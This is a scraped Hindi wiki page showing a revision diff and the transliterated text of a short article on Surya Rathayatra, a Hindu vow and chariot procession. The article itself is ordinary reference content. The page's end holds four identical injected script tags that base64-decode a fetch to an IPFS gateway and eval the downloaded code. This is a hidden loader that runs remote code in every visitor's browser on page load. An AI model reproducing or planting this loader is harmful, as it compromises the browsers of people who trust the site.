Difference between revisions of "सूर्य रथयात्रा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "उल्लखित" to "उल्लिखित")
m (Text replace - ")</ref" to "</ref")
 
(One intermediate revision by the same user not shown)
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*इसे [[रविवार]] को पड़ने वाली [[षष्ठी]] या [[सप्तमी]] पर भी किया जा सकता है।<ref>[[भविष्यपुराण]] (1|58)</ref>  
+
*इसे [[रविवार]] को पड़ने वाली [[षष्ठी]] या [[सप्तमी]] पर भी किया जा सकता है।<ref>[[भविष्यपुराण]] (1|58</ref>  
 
*[[सूर्य देवता|सूर्य]] की रथयात्रा [[माघ]] में प्रारम्भ होती है।  
 
*[[सूर्य देवता|सूर्य]] की रथयात्रा [[माघ]] में प्रारम्भ होती है।  
 
*यदि प्रति वर्ष न की जाए तो एक बार करने के 12 वर्षों के उपरान्त इसे करना चाहिए।
 
*यदि प्रति वर्ष न की जाए तो एक बार करने के 12 वर्षों के उपरान्त इसे करना चाहिए।
Line 7: Line 7:
 
*[[आषाढ़]], [[कार्तिक]] एवं माघ की पूर्णिमाएँ इस यात्रा के लिए अत्यन्त पवित्र मानी जाती हैं।
 
*[[आषाढ़]], [[कार्तिक]] एवं माघ की पूर्णिमाएँ इस यात्रा के लिए अत्यन्त पवित्र मानी जाती हैं।
  
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:56, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • ise ravivar ko p dane vali shashthi ya saptami par bhi kiya ja sakata hai.[1]
  • soory ki rathayatra magh mean prarambh hoti hai.
  • yadi prati varsh n ki jae to ek bar karane ke 12 varshoan ke uparant ise karana chahie.
  • ise alpavadhiyoan mean to d kar nahian karana chahie.
  • soory ke rath par shoodr nahian chadh sakata.
  • ashadh, kartik evan magh ki poornimaean is yatra ke lie atyant pavitr mani jati haian.


tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>